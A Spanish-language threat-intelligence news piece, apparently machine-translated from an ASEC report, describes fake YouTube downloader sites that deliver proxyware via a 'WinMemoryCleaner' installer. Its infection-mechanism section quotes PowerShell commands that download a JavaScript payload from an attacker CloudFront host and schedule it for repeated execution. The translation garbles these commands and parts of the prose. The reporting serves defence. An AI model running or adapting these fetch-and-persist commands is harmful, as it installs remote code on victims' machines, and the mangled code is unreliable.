Los investigadores de ciberseguridad han observado un aumento en los sitios engañosos disfrazados de los servicios de descarga de video de YouTube para entregar malware Proxyware en las últimas semanas.
Las víctimas que buscan obtener videos en formato MP4 se redirigen a través de páginas publicitarias que presentan esporádicamente un enlace de descarga para una utilidad aparentemente legítima llamada “WinMemoryCleaner”.
Detrás de esta fachada inocua, sin embargo, se encuentra un instalador de varias etapas que finalmente implementa proxyware y esclaviza enclavado el ancho de banda de la red del sistema.
La descarga inicial Ejecutable, setup.exe, desempaqueta WinMemoryCleaner.exe en el directorio de archivos de programa antes de activar un script de actualización a través de WinMemoryCleanerUpdate.bat.
Una vez ejecutado, WinMemoryCleaner.exe realiza verificaciones de entorno para evadir máquinas virtuales o análisis de sandbox, luego invoca una carga útil de PowerShell que instala Node.js y obtiene un componente JavaScript malicioso desde un servidor remoto.
Flujo de ataque (fuente – ASEC)
Analistas de ASEC identificado Esta técnica como una evolución refinada de campañas de proxyware anteriores, señalando la dependencia del atacante de GitHub para alojar herramientas intermedias.
Las etapas posteriores implican el registro de dos tareas programadas: “Actualización de programación” y “WindowsDeviceUpdates”, que asegura que el JavaScript se ejecute periódicamente en Node.js.
Esta escritura comunica la información básica del sistema a un servidor de comando y control y espera directivas, que pueden incluir obtener scripts adicionales o iniciar la instalación final de proxyware.
Información enviada al servidor C&C (fuente – ASEC)
Los investigadores de ASEC señalaron que el actor ha girado al distribuir solo el proxyware de DigitalPulse y Honeygain a la integración del agente de Infatica, mejorando las capacidades de robo de ancho de banda.
El impacto de esta campaña es doble: la experiencia de los sistemas afectados degradó el rendimiento de la red, y el atacante monetiza el ancho de banda robado a través de programas de afiliados.
Página de descarga de YouTube y enlace de descarga de malware (fuente – ASEC)
Los programas de proxyware generalmente comparten el rendimiento de la red inactiva, prometiendo una remuneración a los usuarios finales, pero com promete que las víctimas suministran un ancho de banda sin compensación sin compensación.
En regiones con alta adopción de servicios de transmisión, como Corea del Sur, el alcance de la campaña ha crecido significativamente, lo que provocó advertencias de los principales vendedores AV.
Mecanismo de infección
Un examen más profundo del mecanismo de infección revela el papel fundamental del guión de PowerShell entregado por WinMemoryCleaner.exe.
El script comienza con una instalación sigilosa de Node.js:-
Invoke -webRequest -uri “https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi” -outfile “$ env: temp \ node.msi” inicio -proceso msiexec.exe -argumentList ‘/i’, $ env: temp + ‘\ node.msi ”
Una vez que node.js está en su lugar, el script descarga pas.js de una URL de nubefront y lo registra:-
$ jsurl = “https://d14vmbql41e8a5.cloudfront.net/pas.js” invoke -webRequest -uri $ jsurl -outfile “$ env: ProgramFiles \ winMemoryCleaner \ p.js” schtasks /create /f /scindin /mo 30 /tn “otver” /tr “node” nodeer node $ Env: ProgramFiles \ WinMemoryCleaner \ P.JS ”
La ejecución continua del componente JavaScript en Node.js permite actualizaciones dinámicas y la implementación final de la carga útil, lo que hace que la erradicación sea un desafío sin herramientas especializadas.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
